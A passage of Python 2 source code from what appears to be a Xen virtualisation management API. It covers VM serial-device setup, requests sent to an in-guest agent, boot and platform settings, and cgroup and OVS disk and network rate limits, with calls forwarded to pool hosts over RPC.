# if not os.path.exists(SERIAL_FILE):
# os.system("/usr/bin/mkfifo %s" % SERIAL_FILE)
#
# serial_value = 'pipe:%s' % SERIAL_FILE
# log.debug('set serial value: %s' % serial_value)
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
avail_port = dom.get_free_port()
serial_value = 'tcp:127.0.0.1:%s,server,nowait' % avail_port
log.debug('set serial value: %s' % serial_value)
plat = dom.get_platform()
# log.debug('origin platform serial: %s' % plat['serial'])
plat['serial'] = serial_value
dom.info['platform'] = plat
return self._VM_save(dom)
except Exception, exn:
log.debug(exn)
return xen_api_error('create serial failed')
def VM_send_request_via_serial(self, session, vm_ref, json_obj, flag):
'''
@author: wuyuewen
@summary: Send a request into VM's system use serial device.
@precondition: VM is running, has a serial device, already installed a serial Agent in VM's system.
@param session: session of RPC.
@param vm_ref: uuid
@param json_obj: serial request value use json object.
@param flag: True | False, do/don't checkout whether serial Agent is running in VM or not.
@return: True | False.
@rtype: dict.
'''
log.debug('VM send request via serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_send_request_via_serial(session, vm_ref, json_obj, flag)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_send_request_via_serial', vm_ref, json_obj, flag)
else:
return self._VM_send_request_via_serial(session, vm_ref, json_obj, flag)
def _VM_send_request_via_serial(self, session, vm_ref, json_obj, flag):
'''
@author: wuyuewen
@summary: Internal method. Send a request into VM's system use serial device.
@precondition: VM is running, has a serial device, already installed a serial Agent in VM's system.
@param session: session of RPC.
@param vm_ref: uuid
@param json_obj: serial request value use json object.
@param flag: True | False, do/don't checkout whether serial Agent is running in VM or not.
@return: True | False.
@rtype: dict.
'''
try:
response = self._VM_get_platform_serial(session, vm_ref)
if cmp(response['Status'], 'Failure') == 0:
return xen_api_success(False)
address = response.get('Value')
if not address:
log.error('VM serial not correct!')
return xen_api_success(False)
(ip, port) = address
retv = Netctl.serial_opt(ip, port, json_obj, flag)
if retv:
return xen_api_success(True)
else:
return xen_api_success(False)
except Exception ,exn:
log.exception(exn)
return xen_api_success(False)
# edit by wufan
def VM_set_HVM_boot_policy(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_HVM_boot_policy(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_HVM_boot_policy', vm_ref, value)
else:
return self._VM_set_HVM_boot_policy(session, vm_ref, value)
def _VM_set_HVM_boot_policy(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if value != "" and value != "BIOS order":
return xen_api_error(
['VALUE_NOT_SUPPORTED', 'VM.HVM_boot_policy', value,
'Xend supports only the "BIOS order" boot policy.'])
else:
return self.VM_set('HVM_boot_policy', session, vm_ref, value)
def VM_set_HVM_boot_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_HVM_boot_params(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_HVM_boot_params', vm_ref, value)
else:
return self._VM_set_HVM_boot_params(session, vm_ref, value)
def _VM_set_HVM_boot_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('HVM_boot_params', session, vm_ref, value)
def VM_add_to_HVM_boot_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_HVM_boot_params(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_HVM_boot_params', vm_ref, key, value)
else:
return self._VM_add_to_HVM_boot_params(session, vm_ref, key, value)
def _VM_add_to_HVM_boot_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' not in dom.info:
dom.info['HVM_boot_params'] = {}
dom.info['HVM_boot_params'][key] = value
return self._VM_save(dom)
def VM_remove_from_HVM_boot_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_remove_from_HVM_boot_params(session, vm_ref, key)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_remove_from_HVM_boot_params', vm_ref, key)
else:
return self._VM_remove_from_HVM_boot_params(session, vm_ref, key)
def _VM_remove_from_HVM_boot_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' in dom.info \
and key in dom.info['HVM_boot_params']:
del dom.info['HVM_boot_params'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_set_PV_bootloader(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_bootloader', session, vm_ref, value)
def VM_set_PV_kernel(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_kernel', session, vm_ref, value)
def VM_set_PV_ramdisk(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_ramdisk', session, vm_ref, value)
def VM_set_PV_args(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_args', session, vm_ref, value)
def VM_set_PV_bootloader_args(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_bootloader_args', session, vm_ref, value)
def VM_set_platform(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('platform', session, vm_ref, value)
# edit by wufan
def VM_add_to_platform(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Change a attribute in VM paltform.
@precondition: VM not running, key exists in platform field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute in VM platform field.
@param value: value to change.
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_platform(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_platform', vm_ref, key, value)
else:
return self._VM_add_to_platform(session, vm_ref, key, value)
def _VM_add_to_platform(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Internal method. Change a attribute in VM paltform.
@precondition: VM not running, key exists in platform field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute in VM platform field.
@param value: value to change.
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
try:
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
plat[key] = value
return self.VM_set_platform(session, vm_ref, plat)
except KeyError:
return xen_api_error(['key error', vm_ref, key])
def VM_remove_from_platform(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
if key in plat:
del plat[key]
return self.VM_set_platform(session, vm_ref, plat)
else:
return xen_api_success_void()
def VM_set_other_config(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param value: a dict structure of other config.
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_other_config(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_other_config', vm_ref, value)
else:
return self._VM_set_other_config(session, vm_ref, value)
def _VM_set_other_config(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Internal method. Set VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param value: a dict structure of other config.
@return: True | False.
@rtype: dict.
'''
return self.VM_set('other_config', session, vm_ref, value)
def VM_add_to_other_config(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Add a attribute to VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute key.
@param value: attribute value.
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_other_config(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_other_config', vm_ref, key, value)
else:
return self._VM_add_to_other_config(session, vm_ref, key, value)
def _VM_add_to_other_config(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Interal method. Add a attribute to VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute key.
@param value: attribute value.
@return: True | False.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'other_config' in dom.info:
dom.info['other_config'][key] = value
return self._VM_save(dom)
def VM_add_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_tags(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_tags', vm_ref, value)
else:
return self._VM_add_tags(session, vm_ref, value)
def _VM_add_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'tags' in dom.info:
dom.info['tags'].append(value)
return self._VM_save(dom)
def VM_set_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_tags(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_tags', vm_ref, value)
else:
return self._VM_set_tags(session, vm_ref, value)
def _VM_set_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('tags', session, vm_ref, value)
def _VM_update_rate(self, session, vm_ref, type, vif_refs):
'''
@deprecated: not used
'''
eth_list = []
for vif_ref in vif_refs:
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
eth_list.append(eth_num)
#log.debug("--------------->eth list:%s" % eth_list)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
final_tag_list = {}
try:
other_config = self.VM_get_other_config( session, vm_ref).get('Value')
#log.debug('VM update tag')
if other_config:
tag_list = other_config.get(type, {})
if tag_list and isinstance(tag_list, dict):
for key, value in tag_list.items():
if key in eth_list:
final_tag_list[key] = value
dominfo.info['other_config'][type] = final_tag_list
self._VM_save(dominfo)
log.debug('VM_update_%s' % type)
return xen_api_success_void()
except Exception, exn:
log.exception(exn)
return xen_api_success_void()
#add by wufan
def _VM_update_tag(self, session, vm_ref, vif_refs):
'''
@deprecated: not used
'''
eth_list = []
for vif_ref in vif_refs:
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
eth_list.append(eth_num)
#log.debug("--------------->eth list:%s" % eth_list)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
final_tag_list = {}
try:
other_config = self.VM_get_other_config( session, vm_ref).get('Value')
#log.debug('VM update tag')
if other_config:
tag_list = other_config.get('tag', {})
if tag_list and isinstance(tag_list, dict):
for key, value in tag_list.items():
if key in eth_list:
final_tag_list[key] = value
dominfo.info['other_config']['tag'] = final_tag_list
self._VM_save(dominfo)
log.debug('VM_update_tag')
return xen_api_success_void()
except Exception, exn:
log.exception(exn)
return xen_api_success_void()
#add by wufan
def VM_set_all_rate(self, session, vm_ref, param_type, tag_list=None):
'''
@author: wuyuewen
@summary: Set all VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param tag_list: dict of rate for each VIF, the structure is {eth_num : rate}, e.g. {0:1000, 1:1000}
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_all_rate(session, vm_ref, param_type, tag_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_all_rate', vm_ref, param_type, tag_list)
else:
return self._VM_set_all_rate(session, vm_ref, param_type, tag_list)
#add by wufan
def _VM_set_all_rate(self, session, vm_ref, type, tag_list=None):
'''
@author: wuyuewen
@summary: Internal method. Set all VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param tag_list: dict of rate for each VIF, the structure is {eth_num : rate}, e.g. {0:1000, 1:1000}
@return: True | False.
@rtype: dict.
'''
log.debug('set vm all type: %s' % type)
if tag_list is None:
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
for vif_ref in vif_refs:
tag = self._VM_get_rate(session, vm_ref, type, vif_ref).get('Value')
self._VM_set_rate( session, vm_ref, type, vif_ref, tag)
self._VM_update_rate(session, vm_ref, type, vif_refs)
else:
for eth_num, tag in tag_list.items():
self._VM_set_rate_by_ethnum(session, vm_ref, type, eth_num, tag)
return xen_api_success_void()
def VM_get_dev2path_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return xen_api_success(self._VM_get_dev2path_list(session, vm_ref))
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_dev2path_list', vm_ref)
else:
return xen_api_success(self._VM_get_dev2path_list(session, vm_ref))
'''
get device_type, img_path
return: {dev: img_path}
eg:
{'hda': '/home/sr_mount/2133.vhd'}
'''
def _VM_get_dev2path_list(self, session, vm_ref):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
dev2path_list = {}
vbd_refs = self._VM_get_VBDs(session, vm_ref).get('Value')
for vbd_ref in vbd_refs:
if self._VBD_get(vbd_ref, 'type').get('Value').lower() == 'disk':
dev = self._VBD_get(vbd_ref, 'device').get('Value')
# vdi_ref = self._VBD_get(vbd_ref, 'VDI').get('Value')
location = self._VBD_get(vbd_ref, 'uname').get('Value')
# location = storage._get_VDI(vdi_ref).location
dev2path_list[dev] = location
log.debug('_VM_get_dev2path_list')
log.debug(dev2path_list)
return dev2path_list
# when VM start ,async call to find IO pid
def VM_start_set_IO_limit(self, session, vm_ref, io_limit_list={}):
'''
@author: wuyuewen
@summary: Internal method.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return XendTask.log_progress(0, 100,
self.VM_start_init_pid2dev, session, vm_ref, io_limit_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_start_init_pid2dev', vm_ref, io_limit_list)
else:
return XendTask.log_progress(0, 100,
self.VM_start_init_pid2dev, session, vm_ref, io_limit_list)
# local call, called in VM_start_set_IO_limit
def VM_start_init_pid2dev(self, session, vm_ref, io_limit_list):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('VM_start_init_start_pid2dev')
max_count = 0
while True and max_count < 5:
max_count += 1
dom_id = self._VM_get_domid('', vm_ref).get('Value')
if dom_id and dom_id != '-1':
break
time.sleep(2)
if not dom_id:
log.exception('Init pid2dev failed, dom id is None!')
return xen_api_success_void()
max_count = 0
while True and max_count < 5:
max_count += 1
pid2dev_list = XendIOController.get_VM_pid2dev(dom_id)
if pid2dev_list:
break
time.sleep(2)
log.debug('get pid2dev_list:')
log.debug(pid2dev_list)
# self._VM_init_pid2devnum_list(session, vm_ref)
if io_limit_list:
for k, v in io_limit_list.items():
(type, io_unit) = k.split('_')
log.debug('Set disk io rate, type: %s %s, value: %s' % (type, io_unit, v))
self._VM_set_IO_rate_limit(session, vm_ref, type, v, io_unit)
else:
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
rate = self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit).get('Value')
if rate != '-1':
log.debug('Set disk io rate, type: %s %s, value: %s' % (type, io_unit, rate))
self._VM_set_IO_rate_limit(session, vm_ref, type, rate, io_unit)
return xen_api_success_void()
'''get {VM_pid1: (major, minor1), VM_pid2: (major, minor2)}
and cache the result in memory
when start or migrate the vm, call this function
'''
def VM_init_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_init_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_init_pid2devnum_list', vm_ref)
else:
return self._VM_init_pid2devnum_list(session, vm_ref)
def _VM_init_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
log.debug("VM_init_pid2devnum_list")
dev2path_list = self._VM_get_dev2path_list(session, vm_ref)
dom_id = self._VM_get_domid('', vm_ref).get('Value')
pid2devnum_list = XendIOController.get_VM_pid2num(dom_id, dev2path_list)
return self._VM_set_pid2devnum_list(session, vm_ref, pid2devnum_list)
#clear old pid2devnum_list before set
def _VM_set_pid2devnum_list(self, session, vm_ref, pid2devnum_list):
'''
@deprecated: not used
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) pid2devnum:' %(domname))
log.debug(pid2devnum_list)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config']['pid2dev'] = {} #clear pid2dev_list
for pid, devnum in pid2devnum_list.items():
dominfo.info['other_config']['pid2dev'][pid] = devnum
self._VM_save(dominfo)
return xen_api_success(dominfo.info['other_config']['pid2dev'])
def VM_clear_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clear_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_clear_pid2devnum_list', vm_ref)
else:
return self._VM_clear_pid2devnum_list(session, vm_ref)
def _VM_clear_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('clear vm(%s) pid2devnum:' %(domname))
if dominfo.info.get('other_config', {}) and \
'pid2dev' in dominfo.info['other_config']:
del dominfo.info['other_config']['pid2dev']
self._VM_save(dominfo)
return xen_api_success_void()
def VM_get_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_pid2devnum_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_pid2devnum_list', vm_ref)
else:
return self._VM_get_pid2devnum_list(session, vm_ref)
def _VM_get_pid2devnum_list(self, session, vm_ref):
'''
@deprecated: not used
'''
try:
pid2num_list = {}
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
pid2num_list = other_config.get('pid2dev',{})
#if can't get from memory, the excute cmd
if not pid2num_list:
log.debug("cant't get pid2devnum_list from memory, execute cmd")
pid2num_list = self._VM_init_pid2devnum_list(session, vm_ref).get('Value')
log.debug(pid2num_list)
return xen_api_success(pid2num_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(pid2num_list)
def VM_get_vbd2device_list(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_vbd2device_list(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_vbd2device_list', vm_ref)
else:
return self._VM_get_vbd2device_list(session, vm_ref)
def _VM_get_vbd2device_list(self, session, vm_ref):
'''
@deprecated: not used
'''
try:
vbd2device_list = {}
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
vbd2device_list = other_config.get('vbd2device',{})
return xen_api_success(vbd2device_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(vbd2device_list)
'''
type: read | write
flag = True:excute cgroup cmd
flag = False: just set value in config file
'''
def VM_set_IO_rate_limit(self, session, vm_ref, type, value, io_unit):
'''
@author: wuyuewen
@summary: Set VM disk IO rate by cgroup, can set both read/write rate(MBps).
@param session: session of RPC.
@param vm_ref: uuid
@param type: read/write.
@param value: rate(MBps).
@param io_unit: MBps | iops
@param flag: True: excute cgroup cmd, False: just set value in VM's config file.
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_IO_rate_limit(session, vm_ref, type, value, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_IO_rate_limit', vm_ref, type, value, io_unit)
else:
return self._VM_set_IO_rate_limit(session, vm_ref, type, value, io_unit)
def _VM_set_IO_rate_limit(self, session, vm_ref, type, value, io_unit):
'''
@deprecated: not used
'''
#use /cgroup/blkio to constrol
try:
value = int(value)
if value >= 0:
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
tag = '%s_%s_rate' % (type, io_unit)
log.debug('Set vm(%s) %s: %s MBps' %(dominfo.getName(), tag, value))
dom_id = dominfo.getDomid()
dev2path_list = self._VM_get_dev2path_list(session, vm_ref)
pid2num_list = XendIOController.get_VM_pid2num(dom_id, dev2path_list)
XendIOController.set_VM_IO_rate_limit(pid2num_list, type, value, io_unit)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'][tag] = value
self._VM_save(dominfo)
# log.debug("current dominfo:>>>>>>>>>>>>")
# log.debug(dominfo.info['other_config'])
return xen_api_success_void()
elif value == -1:
tag = '%s_%s_rate' % (type, io_unit)
log.debug('%s dont have limit value' % tag)
else:
log.exception('VM set IO rate limit: value invalid')
return xen_api_error(['Value invalid'])
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
'''
limit vm rate:
flag = true :save config and excute cgroup cmd
flag = false: just save the limit rate config
'''
def _VM_set_IO_rate_limit_1(self, session, vm_ref, type, value, io_unit):
'''
@author: wuyuewen
@summary: Interal method. Set VM disk IO rate by cgroup, can set both read/write rate(MBps).
@param session: session of RPC.
@param vm_ref: uuid
@param type: read/write.
@param value: rate(MBps).
@param io_unit: MBps | iops
@param flag: True: excute cgroup cmd, False: just set value in VM's config file.
@return: True | False.
@rtype: dict.
'''
#use /cgroup/blkio to constrol
try:
value = int(value)
if value >= 0:
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
tag = '%s_%s_rate' % (type, io_unit)
log.debug('Set vm(%s) %s: %s MBps' %(domname, tag, value))
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
XendIOController.set_VM_IO_rate_limit(pid2num_list, type, value, io_unit)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'][tag] = value
self._VM_save(dominfo)
# log.debug("current dominfo:>>>>>>>>>>>>")
# log.debug(dominfo.info['other_config'])
return xen_api_success_void()
else:
log.exception('VM set IO rate limit: value invalid')
return xen_api_error(['Value invalid'])
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
def VM_get_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_IO_rate_limit', vm_ref, type, io_unit)
else:
return self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit)
def _VM_get_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
rate = '-1'
tag = '%s_%s_rate' % (type, io_unit)
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
rate = other_config.get(tag,'-1')
return xen_api_success(rate)
except Exception, exn:
log.exception(exn)
return xen_api_success(rate)
def VM_clear_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clear_IO_rate_limit(session, vm_ref, type, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_clear_IO_rate_limit', vm_ref, type, io_unit)
else:
return self._VM_clear_IO_rate_limit(session, vm_ref, type, io_unit)
def _VM_clear_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
#use /cgroup/blkio to constrol
XendIOController.clear_VM_IO_rate_limit(pid2num_list, type, io_unit)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
tag = '%s_%s_rate' % (type, io_unit)
log.debug('clear vm(%s) %s' %(domname, tag))
if dominfo.info.get('other_config', {}) and tag in dominfo.info['other_config']:
del dominfo.info['other_config'][tag] #clear config
self._VM_save(dominfo)
return xen_api_success_void()
def _VM_clean_IO_limit_shutdown(self, session, vm_ref):
'''
@deprecated: not used
'''
log.debug('shutdown clean: pid2dev and rate limit in cgroup file')
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
XendIOController.clear_VM_IO_rate_limit(pid2num_list, type, io_unit)
self._VM_clear_pid2devnum_list(session, vm_ref)
return xen_api_success_void()
def VM_set_rate(self, session, vm_ref, param_type, vif_ref, value):
'''
@author: wuyuewen
@summary: Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_rate(session, vm_ref, param_type, vif_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_rate', vm_ref, param_type, vif_ref,value)
else:
return self._VM_set_rate(session, vm_ref, param_type, vif_ref, value)
def _VM_set_rate(self, session, vm_ref, param_type, vif_ref, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) %s %s:%s' %(domname, str(vif_ref), param_type, value))
device = self.VIF_get_device(session, vif_ref).get('Value')
log.debug('vif_ref:%s VM_set_%s:%s rate:%s' % (vif_ref, param_type, device, value))
template = False
eth_num = ''
if device != '' and device.startswith('eth'):
eth_num = device[3:]
elif not device :
#log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
#log.debug('vif refs: %s' % vif_refs)
try:
eth_num = str(vif_refs.index(vif_ref))
